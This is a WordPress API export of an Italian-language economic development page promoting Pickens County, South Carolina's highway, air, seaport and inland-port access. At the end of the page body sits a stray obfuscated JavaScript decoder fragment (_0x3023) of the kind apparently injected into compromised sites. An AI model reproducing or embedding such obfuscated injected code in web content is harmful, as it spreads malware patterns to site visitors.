{"id":8259,"date":"2020-10-28T16:08:02","date_gmt":"2020-10-28T16:08:02","guid":{"rendered":"http:\/\/alliancepickens.com\/accesso-al-mercato\/"},"modified":"2020-12-09T20:37:35","modified_gmt":"2020-12-09T20:37:35","slug":"accesso-al-mercato","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/","title":{"rendered":"Accesso al mercato"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Logistica<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4944\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #03795b\">Collegamenti autostradali<\/span><\/strong><\/h4>\n<p>Situato a met\u00e0 strada tra Charlotte, North Carolina e Atlanta, Georgia, Pickens County.South Carolina.USA offre alle aziende locali una posizione strategica da cui possono servire i loro clienti nel sud-est degli Stati Uniti e oltre.<\/p>\n<p>Confinante con la I-85, la contea di Pickens vanta 228 miglia di strade primarie statali.<\/p>\n<ul>\n<li>I-85 Da Sud a Georgia (a I-20 e I-75) e Alabama (a I-65)<\/li>\n<li>I-85 North to North Carolina (a I-77 e I-40) e Virginia (a I-95)<\/li>\n<li>I-26 Est a I-20, I-77 e I-95<\/li>\n<li>I-26 Est a Charleston, SC e il porto di Charleston<\/li>\n<li>I-26 West a Charlotte, NC (a I-40)<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4945\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #8a8a8a\">Servizio aereo  <\/span><\/strong><\/h4>\n<p>L&#8217;aeroporto internazionale di Greenville-Spartanburg (SPG) \u00e8 a soli 45 minuti di auto. L&#8217;aeroporto della contea di Pickens (LQK), un aeroporto dell&#8217;aviazione generale, ha una pista di 5002 piedi (pista 23). Con un terminal di nuova costruzione che riflette il fascino della montagna delle Blue Ridge Mountains, questo aeroporto \u00e8 perfetto per i viaggi aerei d&#8217;affari e per il tempo libero.[\/vc_column_text][vc_row_inner el_class=&#8221;airservice&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>Atlanta, Georgia \u2013 ATL \u2013 Endeavor Air, SkyWest Airlines, Southwest, Delta<\/li>\n<li>Charlotte ( Carolina del Nord) \u2013 CLT \u2013 Americano<\/li>\n<li>Chicago, Illinois \u2013 ORD \u2013 ExpressJet Airlines LLC, Envoy Air, American, SkyWest Airlines<\/li>\n<li>Dallas\/Fort Worth, Texas \u2013 DFW \u2013 Americano<\/li>\n<li>Denver, Colorado \u2013 DEN \u2013 Frontiera<\/li>\n<li>Detroit, Michigan \u2013 DTW \u2013 GoJet Airlines LLC \/ United Express, Endeavor Air, SkyWest Airlines, Delta<\/li>\n<li>Fort Lauderdale, Florida \u2013 FLL \u2013 Allegiant Air<\/li>\n<li>Houston, Texas \u2013 IAH \u2013 ExpressJet Airlines LLC, Mesa Airlines<\/li>\n<li>Miami, Florida \u2013 MIA \u2013 Envoy Air<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>New York, New York \u2013 LGA \u2013 Endeavor Air, SkyWest Airlines<\/li>\n<li>Newark, New Jersey \u2013 EWR \u2013 ExpressJet Airlines LLC, United Express<\/li>\n<li>Filadelfia, Pennsylvania \u2013 PHL \u2013 Americano<\/li>\n<li>San Jose, California \u2013 SJC \u2013 Delta, Sun Country Airlines \/ MN Airlines, Atlas Air, American<\/li>\n<li>Sanford, Florida \u2013 SFB \u2013 Allegiant Air<\/li>\n<li>Petersburg, Florida \u2013 PIE \u2013 Allegiant Air<\/li>\n<li>Tampa, Florida \u2013 TPA \u2013 Frontiera<\/li>\n<li>Washington, Virginia \u2013 DCA \u2013 Americano<\/li>\n<li>Washington, Virginia \u2013 IAD \u2013 Delta, ExpressJet Airlines LLC, United, Mesa Airlines, American<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4946\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #1d2c68\">Accesso al porto marino<\/span><\/strong><\/h4>\n<p>Il porto di Charleston \u00e8 un porto di acque profonde con canali portuali interni che registrano -45 piedi, rendendolo il pi\u00f9 profondo nella regione dell&#8217;Atlantico meridionale. L&#8217;impatto economico dei porti della Carolina del Sud \u00e8 notevole. Pi\u00f9 di 280.000 posti di lavoro e 45 miliardi di euro sono attribuiti al funzionamento dei porti ogni anno.[\/vc_column_text][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4947 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"scports lignright wp-image-4956 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg\" alt=\"\" width=\"378\" height=\"314\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg 378w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports-300x249.jpg 300w\" sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><span style=\"color: #5dc9ae\">Porti dell&#8217;entroterra<\/span><\/strong><\/h4>\n<p>L&#8217;Inland Port Greer della Carolina del Sud, situato a poco pi\u00f9 di cinquanta (50) minuti dalla contea di Pickens, \u00e8 un innovativo impianto ferroviario intermodale che offre i vantaggi di un terminal marino costiero molte miglia nell&#8217;entroterra. La South Carolina Ports Authority possiede e gestisce queste strutture che consentono ai proprietari di merci di ridurre al minimo le loro spese interne, migliorando al contempo la flessibilit\u00e0 e l&#8217;efficienza, e realizzando risparmi sui costi variabili come trasferte per container, noleggio telaio e demurrage. Per le aziende interessate ad abbassare la loro impronta di carbonio, queste strutture consentono agli spedizionieri di ridurre le emissioni di carbonio fino all&#8217;80% rispetto a tutti i servizi di autocarri.<\/p>\n<p>Il tempismo \u00e8 tutto. Un treno dedicato Norfolk Southern corre sei (6) giorni alla settimana e fornisce un servizio notturno in entrambe le direzioni da e per il porto di Charleston. Inland Port Greer offre flessibilit\u00e0 e controllo senza precedenti con la disponibilit\u00e0 di contenitori il giorno successivo, che funziona per i produttori che gestiscono linee di produzione strette.  <a href=\"http:\/\/scspa.com\/wp-content\/uploads\/inland-port-greer-qr.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Per saperne di pi\u00f9<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni sul clima aziendale<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;18&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact_directions\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistica [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Collegamenti autostradali Situato a met\u00e0 strada tra Charlotte, North Carolina e Atlanta, Georgia, Pickens County.South Carolina.USA offre alle aziende locali una posizione strategica da cui possono servire i loro clienti nel sud-est degli Stati Uniti e oltre. Confinante con la I-85, la contea di Pickens vanta 228 miglia di&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8323,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8259","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Accesso al mercato - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Accesso al mercato - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistica [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Collegamenti autostradali Situato a met\u00e0 strada tra Charlotte, North Carolina e Atlanta, Georgia, Pickens County.South Carolina.USA offre alle aziende locali una posizione strategica da cui possono servire i loro clienti nel sud-est degli Stati Uniti e oltre. Confinante con la I-85, la contea di Pickens vanta 228 miglia di&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:37:35+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/\",\"name\":\"Accesso al mercato - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"datePublished\":\"2020-10-28T16:08:02+00:00\",\"dateModified\":\"2020-12-09T20:37:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/accesso-al-mercato\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Clima aziendale\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/clima-aziendale\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Accesso al mercato\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Accesso al mercato - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/","og_locale":"it_IT","og_type":"article","og_title":"Accesso al mercato - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistica [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Collegamenti autostradali Situato a met\u00e0 strada tra Charlotte, North Carolina e Atlanta, Georgia, Pickens County.South Carolina.USA offre alle aziende locali una posizione strategica da cui possono servire i loro clienti nel sud-est degli Stati Uniti e oltre. Confinante con la I-85, la contea di Pickens vanta 228 miglia di&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:37:35+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/","url":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/","name":"Accesso al mercato - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","datePublished":"2020-10-28T16:08:02+00:00","dateModified":"2020-12-09T20:37:35+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/accesso-al-mercato\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Clima aziendale","item":"https:\/\/alliancepickens.com\/it\/clima-aziendale\/"},{"@type":"ListItem","position":3,"name":"Accesso al mercato"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/8259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=8259"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/8259\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/8323"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=8259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}